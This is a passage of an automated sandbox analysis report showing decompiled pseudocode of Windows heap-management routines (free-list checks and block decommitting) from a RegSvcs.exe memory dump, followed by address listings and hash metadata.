                                          							_t220 =  *[fs:0x30];
                                          							__eflags =  *(_t220 + 0xc);
                                          							if( *(_t220 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push(_t328);
                                          							_push(_v24);
                                          							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
                                          							goto L58;
                                          						} else {
                                          							goto L50;
                                          						}
                                          						while(1) {
                                          							L50:
                                          							_t92 = _t327 - 0x10; // -24
                                          							_t282 = _t331;
                                          							_t230 = E013B4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
                                          							__eflags = _t230;
                                          							if(_t230 == 0) {
                                          								goto L59;
                                          							}
                                          							_t327 =  *_t327;
                                          							__eflags = _t327 - _t261;
                                          							if(_t327 != _t261) {
                                          								continue;
                                          							}
                                          							_t184 = _v24;
                                          							_t282 = _v36;
                                          							goto L53;
                                          						}
                                          						goto L59;
                                          					} else {
                                          						while(1) {
                                          							_t39 = _t326 + 0x18; // 0x10
                                          							_t264 = _t39;
                                          							if(_t331[0x13] != 0) {
                                          								_t319 = _t331[0x14] ^  *_t264;
                                          								 *_t264 = _t319;
                                          								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
                                          								_t348 = _t319 >> 0x18 - _t303;
                                          								if(_t319 >> 0x18 != _t303) {
                                          									_push(_t303);
                                          									E013AFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
                                          								}
                                          								_t281 = 0x81;
                                          							}
                                          							_t317 = _v20;
                                          							if(_t317 != 0) {
                                          								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
                                          								_t350 = _t241;
                                          								if(_t350 != 0) {
                                          									if(_t350 >= 0) {
                                          										__eflags = _t241 & 0x00000800;
                                          										if(__eflags == 0) {
                                          											__eflags = _t241 - _t331[0x21];
                                          											if(__eflags < 0) {
                                          												_t298 = _t241;
                                          												_t65 = _t317 + _t298 * 4;
                                          												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
                                          												__eflags =  *_t65;
                                          											}
                                          										}
                                          									} else {
                                          										_t244 = _t241 & 0x00007fff;
                                          										if(_t244 < _t281) {
                                          											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
                                          										}
                                          									}
                                          								}
                                          							}
                                          							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E013A23E3(_t331, _t264) == 0) {
                                          								break;
                                          							}
                                          							if(_t331[0x13] != 0) {
                                          								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
                                          								 *_t264 =  *_t264 ^ _t331[0x14];
                                          							}
                                          							_t326 =  *_t326;
                                          							if( &(_t331[0x27]) == _t326) {
                                          								goto L49;
                                          							} else {
                                          								_t281 = 0x81;
                                          								continue;
                                          							}
                                          						}
                                          						__eflags = _t331[0x13];
                                          						if(_t331[0x13] != 0) {
                                          							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
                                          							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
                                          						}
                                          						goto L65;
                                          					}
                                          				} else {
                                          					L83:
                                          					return _t267;
                                          				}
                                          			}

                                          0x013b46f6
                                          0x013b46ec
                                          0x013b4615
                                          0x013b4615
                                          0x013b461d
                                          0x013b462e
                                          0x013b462e
                                          0x013b461d
                                          0x013b460f
                                          0x013b4609
                                          0x013b46fd
                                          0x00000000
                                          0x00000000
                                          0x013b4710
                                          0x013b471a
                                          0x013b4720
                                          0x013b4720
                                          0x013b4722
                                          0x013b472c
                                          0x00000000
                                          0x013b472e
                                          0x013b472e
                                          0x00000000
                                          0x013b472e
                                          0x013b472c
                                          0x013b4738
                                          0x013b473c
                                          0x013b474b
                                          0x013b4751
                                          0x013b4751
                                          0x00000000
                                          0x013b473c
                                          0x013b48f4
                                          0x013b48f4
                                          0x00000000
                                          0x013b48f4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: ae79397acea5e61baba1ed3663f99ea16628b67169496c8891edcd01fcc6aee7
                                          • Instruction ID: 988cf7daf6881e427b30e1221ea15d573638a34e00706af3971966e943d59190
                                          • Opcode Fuzzy Hash: ae79397acea5e61baba1ed3663f99ea16628b67169496c8891edcd01fcc6aee7
                                          • Instruction Fuzzy Hash: B1F1233161064ADFDB25CF69C484BFAFBF5FF45318F048029E28697A42E730A945CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E0131A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
                                          				char _v8;
                                          				signed short _v12;
                                          				signed short _v16;
                                          				signed int _v20;
                                          				signed int _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				unsigned int _v52;
                                          				signed int _v56;
                                          				void* _v60;
                                          				intOrPtr _v64;
                                          				void* _v72;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				unsigned int _t246;
                                          				signed char _t247;
                                          				signed short _t249;
                                          				unsigned int _t256;
                                          				signed int _t262;
                                          				signed int _t265;
                                          				signed int _t266;
                                          				signed int _t267;
                                          				intOrPtr _t270;
                                          				signed int _t280;
                                          				signed int _t286;
                                          				signed int _t289;
                                          				intOrPtr _t290;
                                          				signed int _t291;
                                          				signed int _t317;
                                          				signed short _t320;
                                          				intOrPtr _t327;
                                          				signed int _t339;
                                          				signed int _t344;
                                          				signed int _t347;
                                          				intOrPtr _t348;
                                          				signed int _t350;
                                          				signed int _t352;
                                          				signed int _t353;
                                          				signed int _t356;
                                          				intOrPtr _t357;
                                          				intOrPtr _t366;
                                          				signed int _t367;
                                          				signed int _t370;
                                          				intOrPtr _t371;
                                          				signed int _t372;
                                          				signed int _t394;
                                          				signed short _t402;
                                          				intOrPtr _t404;
                                          				intOrPtr _t415;
                                          				signed int _t430;
                                          				signed int _t433;
                                          				signed int _t437;
                                          				signed int _t445;
                                          				signed short _t446;
                                          				signed short _t449;
                                          				signed short _t452;
                                          				signed int _t455;
                                          				signed int _t460;
                                          				signed short* _t468;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				signed int _t483;
                                          				intOrPtr _t484;
                                          				signed int _t491;
                                          				unsigned int _t506;
                                          				unsigned int _t508;
                                          				signed int _t513;
                                          				signed int _t514;
                                          				signed int _t521;
                                          				signed short* _t533;
                                          				signed int _t541;
                                          				signed int _t543;
                                          				signed int _t546;
                                          				unsigned int _t551;
                                          				signed int _t553;
                                          
                                          				_t450 = __ecx;
                                          				_t553 = __ecx;
                                          				_t539 = __edx;
                                          				_v28 = 0;
                                          				_v40 = 0;
                                          				if(( *(__ecx + 0xcc) ^  *0x13e8a68) != 0) {
                                          					_push(_a4);
                                          					_t513 = __edx;
                                          					L11:
                                          					_t246 = E0131A830(_t450, _t513);
                                          					L7:
                                          					return _t246;
                                          				}
                                          				if(_a8 != 0) {
                                          					__eflags =  *(__edx + 2) & 0x00000008;
                                          					if(( *(__edx + 2) & 0x00000008) != 0) {
                                          						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
                                          						_t430 = E0131DF24(__edx,  &_v12,  &_v16);
                                          						__eflags = _t430;
                                          						if(_t430 != 0) {
                                          							_t157 = _t553 + 0x234;
                                          							 *_t157 =  *(_t553 + 0x234) - _v16;
                                          							__eflags =  *_t157;
                                          						}
                                          					}
                                          					_t445 = _a4;
                                          					_t514 = _t539;
                                          					_v48 = _t539;
                                          					L14:
                                          					_t247 =  *((intOrPtr*)(_t539 + 6));
                                          					__eflags = _t247;
                                          					if(_t247 == 0) {
                                          						_t541 = _t553;
                                          					} else {
                                          						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
                                          						__eflags = _t541;
                                          					}
                                          					_t249 = 7 + _t445 * 8 + _t514;
                                          					_v12 = _t249;
                                          					__eflags =  *_t249 - 3;
                                          					if( *_t249 == 3) {
                                          						_v16 = _t514 + _t445 * 8 + 8;
                                          						E012F9373(_t553, _t514 + _t445 * 8 + 8);
                                          						_t452 = _v16;
                                          						_v28 =  *(_t452 + 0x10);
                                          						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
                                          						_v36 =  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
                                          						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
                                          						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
                                          						_t256 =  *(_t452 + 0x14);
                                          						__eflags = _t256 - 0x7f000;
                                          						if(_t256 >= 0x7f000) {
                                          							_t142 = _t553 + 0x1ec;
                                          							 *_t142 =  *(_t553 + 0x1ec) - _t256;
                                          							__eflags =  *_t142;
                                          							_t256 =  *(_t452 + 0x14);
                                          						}
                                          						_t513 = _v48;
                                          						_t445 = _t445 + (_t256 >> 3) + 0x20;
                                          						_a4 = _t445;
                                          						_v40 = 1;
                                          					} else {
                                          						_t27 =  &_v36;
                                          						 *_t27 = _v36 & 0x00000000;
                                          						__eflags =  *_t27;
                                          					}
                                          					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
                                          					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
                                          						_v44 = _t513;
                                          						_t262 = E012FA9EF(_t541, _t513);
                                          						__eflags = _a8;
                                          						_v32 = _t262;
                                          						if(_a8 != 0) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								goto L19;
                                          							}
                                          						}
                                          						__eflags =  *0x13e8748 - 1;
                                          						if( *0x13e8748 >= 1) {
                                          							__eflags = _t262;
                                          							if(_t262 == 0) {
                                          								_t415 =  *[fs:0x30];
                                          								__eflags =  *(_t415 + 0xc);
                                          								if( *(_t415 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E012FB150();
                                          								} else {
                                          									E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          								}
                                          								_push("(UCRBlock != NULL)");
                                          								E012FB150();
                                          								__eflags =  *0x13e7bc8;
                                          								if( *0x13e7bc8 == 0) {
                                          									__eflags = 1;
                                          									E013B2073(_t445, 1, _t541, 1);
                                          								}
                                          								_t513 = _v48;
                                          								_t445 = _a4;
                                          							}
                                          						}
                                          						_t350 = _v40;
                                          						_t480 = _t445 << 3;
                                          						_v20 = _t480;
                                          						_t481 = _t480 + _t513;
                                          						_v24 = _t481;
                                          						__eflags = _t350;
                                          						if(_t350 == 0) {
                                          							_t481 = _t481 + 0xfffffff0;
                                          							__eflags = _t481;
                                          						}
                                          						_t483 = (_t481 & 0xfffff000) - _v44;
                                          						__eflags = _t483;
                                          						_v52 = _t483;
                                          						if(_t483 == 0) {
                                          							__eflags =  *0x13e8748 - 1;
                                          							if( *0x13e8748 < 1) {
                                          								goto L9;
                                          							}
                                          							__eflags = _t350;
                                          							goto L146;
                                          						} else {
                                          							_t352 = E0132174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t352;
                                          							if(_t352 < 0) {
                                          								goto L94;
                                          							}
                                          							_t353 = E01317D50();
                                          							_t447 = 0x7ffe0380;
                                          							__eflags = _t353;
                                          							if(_t353 != 0) {
                                          								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t356 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t356;
                                          							if( *_t356 != 0) {
                                          								_t357 =  *[fs:0x30];
                                          								__eflags =  *(_t357 + 0x240) & 0x00000001;
                                          								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
                                          									E013B14FB(_t447, _t553, _v44, _v52, 5);
                                          								}
                                          							}
                                          							_t358 = _v32;
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t484 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t484 - 0x7f000;
                                          							if(_t484 >= 0x7f000) {
                                          								_t90 = _t553 + 0x1ec;
                                          								 *_t90 =  *(_t553 + 0x1ec) - _t484;
                                          								__eflags =  *_t90;
                                          							}
                                          							E012F9373(_t553, _t358);
                                          							_t486 = _v32;
                                          							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
                                          							E012F9819(_t486);
                                          							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
                                          							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
                                          							_t366 =  *((intOrPtr*)(_v32 + 0x14));
                                          							__eflags = _t366 - 0x7f000;
                                          							if(_t366 >= 0x7f000) {
                                          								_t104 = _t553 + 0x1ec;
                                          								 *_t104 =  *(_t553 + 0x1ec) + _t366;
                                          								__eflags =  *_t104;
                                          							}
                                          							__eflags = _v40;
                                          							if(_v40 == 0) {
                                          								_t533 = _v52 + _v44;
                                          								_v32 = _t533;
                                          								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          								__eflags = _v24 - _v52 + _v44;
                                          								if(_v24 == _v52 + _v44) {
                                          									__eflags =  *(_t553 + 0x4c);
                                          									if( *(_t553 + 0x4c) != 0) {
                                          										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
                                          										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
                                          									}
                                          								} else {
                                          									_t449 = 0;
                                          									_t533[3] = 0;
                                          									_t533[1] = 0;
                                          									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
                                          									_t491 = _t394;
                                          									 *_t533 = _t394;
                                          									__eflags =  *0x13e8748 - 1; // 0x0
                                          									if(__eflags >= 0) {
                                          										__eflags = _t491 - 1;
                                          										if(_t491 <= 1) {
                                          											_t404 =  *[fs:0x30];
                                          											__eflags =  *(_t404 + 0xc);
                                          											if( *(_t404 + 0xc) == 0) {
                                          												_push("HEAP: ");
                                          												E012FB150();
                                          											} else {
                                          												E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          											}
                                          											_push("((LONG)FreeEntry->Size > 1)");
                                          											E012FB150();
                                          											_pop(_t491);
                                          											__eflags =  *0x13e7bc8 - _t449; // 0x0
                                          											if(__eflags == 0) {
                                          												__eflags = 0;
                                          												_t491 = 1;
                                          												E013B2073(_t449, 1, _t541, 0);
                                          											}
                                          											_t533 = _v32;
                                          										}
                                          									}
                                          									_t533[1] = _t449;
                                          									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
                                          										_t402 = (_t533 - _t541 >> 0x10) + 1;
                                          										_v16 = _t402;
                                          										__eflags = _t402 - 0xfe;
                                          										if(_t402 >= 0xfe) {
                                          											_push(_t491);
                                          											_push(_t449);
                                          											E013BA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
                                          											_t533 = _v48;
                                          											_t402 = _v32;
                                          										}
                                          										_t449 = _t402;
                                          									}
                                          									_t533[3] = _t449;
                                          									E0131A830(_t553, _t533,  *_t533 & 0x0000ffff);
                                          									_t447 = 0x7ffe0380;
                                          								}
                                          							}
                                          							_t367 = E01317D50();
                                          							__eflags = _t367;
                                          							if(_t367 != 0) {
                                          								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t370 = _t447;
                                          							}
                                          							__eflags =  *_t370;
                                          							if( *_t370 != 0) {
                                          								_t371 =  *[fs:0x30];
                                          								__eflags =  *(_t371 + 0x240) & 1;
                                          								if(( *(_t371 + 0x240) & 1) != 0) {
                                          									__eflags = E01317D50();
                                          									if(__eflags != 0) {
                                          										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          									}
                                          									E013B1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
                                          								}
                                          							}
                                          							_t372 = E01317D50();
                                          							_t546 = 0x7ffe038a;
                                          							_t446 = 0x230;
                                          							__eflags = _t372;
                                          							if(_t372 != 0) {
                                          								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          							} else {
                                          								_t246 = 0x7ffe038a;
                                          							}
                                          							__eflags =  *_t246;
                                          							if( *_t246 == 0) {
                                          								goto L7;
                                          							} else {
                                          								__eflags = E01317D50();
                                          								if(__eflags != 0) {
                                          									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
                                          									__eflags = _t546;
                                          								}
                                          								_push( *_t546 & 0x000000ff);
                                          								_push(_v36);
                                          								_push(_v40);
                                          								goto L120;
                                          							}
                                          						}
                                          					} else {
                                          						L19:
                                          						_t31 = _t513 + 0x101f; // 0x101f
                                          						_t455 = _t31 & 0xfffff000;
                                          						_t32 = _t513 + 0x28; // 0x28
                                          						_v44 = _t455;
                                          						__eflags = _t455 - _t32;
                                          						if(_t455 == _t32) {
                                          							_t455 = _t455 + 0x1000;
                                          							_v44 = _t455;
                                          						}
                                          						_t265 = _t445 << 3;
                                          						_v24 = _t265;
                                          						_t266 = _t265 + _t513;
                                          						__eflags = _v40;
                                          						_v20 = _t266;
                                          						if(_v40 == 0) {
                                          							_t266 = _t266 + 0xfffffff0;
                                          							__eflags = _t266;
                                          						}
                                          						_t267 = _t266 & 0xfffff000;
                                          						_v52 = _t267;
                                          						__eflags = _t267 - _t455;
                                          						if(_t267 < _t455) {
                                          							__eflags =  *0x13e8748 - 1; // 0x0
                                          							if(__eflags < 0) {
                                          								L9:
                                          								_t450 = _t553;
                                          								L10:
                                          								_push(_t445);
                                          								goto L11;
                                          							}
                                          							__eflags = _v40;
                                          							L146:
                                          							if(__eflags == 0) {
                                          								goto L9;
                                          							}
                                          							_t270 =  *[fs:0x30];
                                          							__eflags =  *(_t270 + 0xc);
                                          							if( *(_t270 + 0xc) == 0) {
                                          								_push("HEAP: ");
                                          								E012FB150();
                                          							} else {
                                          								E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          							}
                                          							_push("(!TrailingUCR)");
                                          							E012FB150();
                                          							__eflags =  *0x13e7bc8;
                                          							if( *0x13e7bc8 == 0) {
                                          								__eflags = 0;
                                          								E013B2073(_t445, 1, _t541, 0);
                                          							}
                                          							L152:
                                          							_t445 = _a4;
                                          							L153:
                                          							_t513 = _v48;
                                          							goto L9;
                                          						}
                                          						_v32 = _t267;
                                          						_t280 = _t267 - _t455;
                                          						_v32 = _v32 - _t455;
                                          						__eflags = _a8;
                                          						_t460 = _v32;
                                          						_v52 = _t460;
                                          						if(_a8 != 0) {
                                          							L27:
                                          							__eflags = _t280;
                                          							if(_t280 == 0) {
                                          								L33:
                                          								_t446 = 0;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									_t468 = _v44 + _v52;
                                          									_v36 = _t468;
                                          									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
                                          									__eflags = _v20 - _v52 + _v44;
                                          									if(_v20 == _v52 + _v44) {
                                          										__eflags =  *(_t553 + 0x4c);
                                          										if( *(_t553 + 0x4c) != 0) {
                                          											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
                                          											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
                                          										}
                                          									} else {
                                          										_t468[3] = 0;
                                          										_t468[1] = 0;
                                          										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
                                          										_t521 = _t317;
                                          										 *_t468 = _t317;
                                          										__eflags =  *0x13e8748 - 1; // 0x0
                                          										if(__eflags >= 0) {
                                          											__eflags = _t521 - 1;
                                          											if(_t521 <= 1) {
                                          												_t327 =  *[fs:0x30];
                                          												__eflags =  *(_t327 + 0xc);
                                          												if( *(_t327 + 0xc) == 0) {
                                          													_push("HEAP: ");
                                          													E012FB150();
                                          												} else {
                                          													E012FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          												}
                                          												_push("(LONG)FreeEntry->Size > 1");
                                          												E012FB150();
                                          												__eflags =  *0x13e7bc8 - _t446; // 0x0
                                          												if(__eflags == 0) {
                                          													__eflags = 1;
                                          													E013B2073(_t446, 1, _t541, 1);
                                          												}
                                          												_t468 = _v36;
                                          											}
                                          										}
                                          										_t468[1] = _t446;
                                          										_t522 =  *((intOrPtr*)(_t541 + 0x18));
                                          										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
                                          										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
                                          											_t320 = _t446;
                                          										} else {
                                          											_t320 = (_t468 - _t541 >> 0x10) + 1;
                                          											_v12 = _t320;
                                          											__eflags = _t320 - 0xfe;
                                          											if(_t320 >= 0xfe) {
                                          												_push(_t468);
                                          												_push(_t446);
                                          												E013BA80D(_t522, 3, _t468, _t541);
                                          												_t468 = _v52;
                                          												_t320 = _v28;
                                          											}
                                          										}
                                          										_t468[3] = _t320;
                                          										E0131A830(_t553, _t468,  *_t468 & 0x0000ffff);
                                          									}
                                          								}
                                          								E0131B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
                                          								E0131A830(_t553, _v64, _v24);
                                          								_t286 = E01317D50();
                                          								_t542 = 0x7ffe0380;
                                          								__eflags = _t286;
                                          								if(_t286 != 0) {
                                          									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          								} else {
                                          									_t289 = 0x7ffe0380;
                                          								}
                                          								__eflags =  *_t289;
                                          								if( *_t289 != 0) {
                                          									_t290 =  *[fs:0x30];
                                          									__eflags =  *(_t290 + 0x240) & 1;
                                          									if(( *(_t290 + 0x240) & 1) != 0) {
                                          										__eflags = E01317D50();
                                          										if(__eflags != 0) {
                                          											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          										}
                                          										E013B1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
                                          									}
                                          								}
                                          								_t291 = E01317D50();
                                          								_t543 = 0x7ffe038a;
                                          								__eflags = _t291;
                                          								if(_t291 != 0) {
                                          									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          								} else {
                                          									_t246 = 0x7ffe038a;
                                          								}
                                          								__eflags =  *_t246;
                                          								if( *_t246 != 0) {
                                          									__eflags = E01317D50();
                                          									if(__eflags != 0) {
                                          										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
                                          										__eflags = _t543;
                                          									}
                                          									_push( *_t543 & 0x000000ff);
                                          									_push(_t446);
                                          									_push(_t446);
                                          									L120:
                                          									_push( *(_t553 + 0x74) << 3);
                                          									_push(_v52);
                                          									_t246 = E013B1411(_t446, _t553, _v44, __eflags);
                                          								}
                                          								goto L7;
                                          							}
                                          							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
                                          							_t339 = E0132174B( &_v44,  &_v52, 0x4000);
                                          							__eflags = _t339;
                                          							if(_t339 < 0) {
                                          								L94:
                                          								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
                                          								__eflags = _v40;
                                          								if(_v40 == 0) {
                                          									goto L153;
                                          								}
                                          								E0131B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
                                          								goto L152;
                                          							}
                                          							_t344 = E01317D50();
                                          							__eflags = _t344;
                                          							if(_t344 != 0) {
                                          								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          							} else {
                                          								_t347 = 0x7ffe0380;
                                          							}
                                          							__eflags =  *_t347;
                                          							if( *_t347 != 0) {
                                          								_t348 =  *[fs:0x30];
                                          								__eflags =  *(_t348 + 0x240) & 1;
                                          								if(( *(_t348 + 0x240) & 1) != 0) {
                                          									E013B14FB(_t445, _t553, _v44, _v52, 6);
                                          								}
                                          							}
                                          							_t513 = _v48;
                                          							goto L33;
                                          						}
                                          						__eflags =  *_v12 - 3;
                                          						_t513 = _v48;
                                          						if( *_v12 == 3) {
                                          							goto L27;
                                          						}
                                          						__eflags = _t460;
                                          						if(_t460 == 0) {
                                          							goto L9;
                                          						}
                                          						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                          						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                          							goto L9;
                                          						}
                                          						goto L27;
                                          					}
                                          				}
                                          				_t445 = _a4;
                                          				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                          					_t513 = __edx;
                                          					goto L10;
                                          				}
                                          				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                          				_v20 = _t433;
                                          				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                          					_t513 = _t539;
                                          					goto L9;
                                          				} else {
                                          					_t437 = E013199BF(__ecx, __edx,  &_a4, 0);
                                          					_t445 = _a4;
                                          					_t514 = _t437;
                                          					_v56 = _t514;
                                          					if(_t445 - 0x201 > 0xfbff) {
                                          						goto L14;
                                          					} else {
                                          						E0131A830(__ecx, _t514, _t445);
                                          						_t506 =  *(_t553 + 0x238);
                                          						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                          						_t246 = _t506 >> 4;
                                          						if(_t551 < _t506 - _t246) {
                                          							_t508 =  *(_t553 + 0x23c);
                                          							_t246 = _t508 >> 2;
                                          							__eflags = _t551 - _t508 - _t246;
                                          							if(_t551 > _t508 - _t246) {
                                          								_t246 = E0132ABD8(_t553);
                                          								 *(_t553 + 0x23c) = _t551;
                                          								 *(_t553 + 0x238) = _t551;
                                          							}
                                          						}
                                          						goto L7;
                                          					}
                                          				}
                                          			}
                                          0x0136226e
                                          0x0136224c
                                          0x01362261
                                          0x01362266
                                          0x01362274
                                          0x01362279
                                          0x0136227e
                                          0x01362286
                                          0x01362288
                                          0x0136228d
                                          0x0136228d
                                          0x01362292
                                          0x01362292
                                          0x01362295
                                          0x01362295
                                          0x00000000
                                          0x01362295
                                          0x0131a485
                                          0x0131a489
                                          0x0131a48b
                                          0x0131a48f
                                          0x0131a493
                                          0x0131a497
                                          0x0131a49b
                                          0x0131a4bb
                                          0x0131a4bb
                                          0x0131a4bd
                                          0x0131a4ff
                                          0x0131a4ff
                                          0x0131a501
                                          0x0131a505
                                          0x0131a50f
                                          0x0131a517
                                          0x0131a51b
                                          0x0131a527
                                          0x0131a52b
                                          0x01362182
                                          0x01362185
                                          0x01362193
                                          0x01362199
                                          0x01362199
                                          0x0131a531
                                          0x0131a535
                                          0x0131a538
                                          0x0131a548
                                          0x0131a54b
                                          0x0131a54d
                                          0x0131a553
                                          0x0131a559
                                          0x01362100
                                          0x01362103
                                          0x01362109
                                          0x0136210f
                                          0x01362112
                                          0x01362131
                                          0x01362136
                                          0x01362114
                                          0x01362129
                                          0x0136212e
                                          0x0136213c
                                          0x01362141
                                          0x01362147
                                          0x0136214d
                                          0x01362151
                                          0x01362154
                                          0x01362154
                                          0x01362159
                                          0x01362159
                                          0x01362103
                                          0x0131a55f
                                          0x0131a562
                                          0x0131a565
                                          0x0131a567
                                          0x01362162
                                          0x0131a56d
                                          0x0131a574
                                          0x0131a575
                                          0x0131a579
                                          0x0131a57e
                                          0x01362169
                                          0x0136216a
                                          0x01362170
                                          0x01362175
                                          0x01362179
                                          0x01362179
                                          0x0131a57e
                                          0x0131a584
                                          0x0131a58f
                                          0x0131a58f
                                          0x0131a52b
                                          0x0131a5ad
                                          0x0131a5bc
                                          0x0131a5c1
                                          0x0131a5c6
